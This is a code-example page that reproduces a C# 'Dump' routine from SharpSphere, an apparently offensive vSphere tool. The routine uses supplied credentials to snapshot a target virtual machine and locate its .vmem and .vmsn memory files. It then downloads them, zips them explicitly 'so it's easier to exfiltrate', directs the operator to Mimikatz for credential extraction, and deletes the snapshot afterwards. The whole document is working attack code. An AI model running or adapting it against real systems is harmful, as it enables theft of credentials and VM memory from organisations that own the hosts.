C# (CSharp) VimPortTypeClient.SearchDatastore_Task示例

示例#1

文件： Program.cs 项目： sec-js/SharpSphere

        static int Dump(DumpOptions options)
        {
            try
            {
                //Connect to target
                Connect(options.url, options.username, options.password, null);

                //Find target VM
                vm = GetTargetVM(options.targetvm);
                if (vm is null)
                {
                    Error(new Exception("Failed to find target VM " + options.targetvm + ", are you sure the name is right?"));
                }

                //Create Snapshot if specified, otherwise find existing one
                ManagedObjectReference snapshot = GetSnapshot(options.targetvm, options.snapshot);

                //Get information about the snapshot
                VirtualMachineFileInfo fileInfo = GetProperty <VirtualMachineConfigInfo>(snapshot, "config").files;

                //Build the objects we need
                ManagedObjectReference environmentBrowser = GetProperty <ManagedObjectReference>(vm, "environmentBrowser");
                ManagedObjectReference datastoreBrowser   = GetProperty <ManagedObjectReference>(environmentBrowser, "datastoreBrowser");

                //Search for a vmem file
                ManagedObjectReference task = vim.SearchDatastore_Task(datastoreBrowser, fileInfo.snapshotDirectory, GetHostDatastoreBrowserSearchSpec());
                TaskInfo info  = GetProperty <TaskInfo>(task, "info");
                string   state = info.state.ToString();
                while (state != "success")
                {
                    switch (state)
                    {
                    case "error":
                        Error(new Exception("Error searching datastore for snapshot files"));
                        break;

                    case "running":
                        Thread.Sleep(1000);
                        break;
                    }
                    state = GetProperty <TaskInfo>(task, "info").state.ToString();
                }
                HostDatastoreBrowserSearchResults results = (HostDatastoreBrowserSearchResults)GetProperty <TaskInfo>(task, "info").result;


                //Check at least one vmem exists, which it may not if not using --snapshot
                FileInfo latestFile = null;
                if (results.file.Length == 0)
                {
                    Error(new Exception("Failed to find any .vmem files associated with the VM, despite there being snapshots. Virtual machine memory may not have been captured. Recommend rerunning with --snapshot"));
                }

                //Grab the latest .vmem file if there is more than one associated with a VM
                foreach (FileInfo file in results.file)
                {
                    if (latestFile == null || DateTime.Compare(file.modification, latestFile.modification) > 0)
                    {
                        latestFile = file;
                    }
                }

                //Build the URLs to download directly from datastore
                string host       = options.url.Remove(options.url.Length - 4);
                string dsName     = FindTextBetween(results.folderPath, "[", "]");
                string folderPath = results.folderPath.Remove(0, dsName.Length + 3);
                string vmemURL    = host + "/folder/" + folderPath + latestFile.path + "?dcPath=" + datacenterName + "&dsName=" + dsName;
                string vmsnURL    = host + "/folder/" + folderPath + latestFile.path.Replace(".vmem", ".vmsn") + "?dcPath=" + datacenterName + "&dsName=" + dsName;
                string vmemFile   = options.destination.Replace("\"", string.Empty) + @"\" + Path.GetRandomFileName();
                string vmsnFile   = options.destination.Replace("\"", string.Empty) + @"\" + Path.GetRandomFileName();
                string zipFile    = options.destination.Replace("\"", string.Empty) + @"\" + Path.GetRandomFileName();

                //Make the web requests
                using (var client = new System.Net.WebClient())
                {
                    client.Credentials = new System.Net.NetworkCredential(options.username, options.password);
                    client.Headers.Set(System.Net.HttpRequestHeader.ContentType, "application/octet-stream");
                    client.CachePolicy = new HttpRequestCachePolicy(HttpRequestCacheLevel.NoCacheNoStore);
                    Log("[x] Downloading " + latestFile.path + " (" + latestFile.fileSize / 1048576 + @"MB) to " + vmemFile + "...");
                    client.DownloadFile(vmemURL, vmemFile);

                    Log("[x] Downloading " + latestFile.path.Replace(".vmem", ".vmsn") + " to " + vmsnFile + "...");
                    client.DownloadFile(vmsnURL, vmsnFile);
                }

                //Zip up the two downloaded files
                Log("[x] Download complete, zipping up so it's easier to exfiltrate...");
                var zip = ZipFile.Open(zipFile, ZipArchiveMode.Create);
                zip.CreateEntryFromFile(vmemFile, Path.GetFileName(vmemFile), CompressionLevel.Optimal);
                zip.CreateEntryFromFile(vmsnFile, Path.GetFileName(vmsnFile), CompressionLevel.Optimal);
                zip.Dispose();
                File.Delete(vmemFile);
                File.Delete(vmsnFile);
                System.IO.FileInfo zipFileInfo = new System.IO.FileInfo(zipFile);
                Log("[x] Zipping complete, download " + zipFile + " (" + zipFileInfo.Length / 1048576 + "MB), rename to .zip, and follow instructions to use with Mimikatz");

                //Delete the snapshot we created if needed
                if (options.snapshot)
                {
                    Log("[x] Deleting the snapshot we created");
                    vim.RemoveSnapshot_Task(snapshot, false, true);
                }
            }
            catch (Exception fault)
            {
                Error(fault);
            }
            return(0);
        }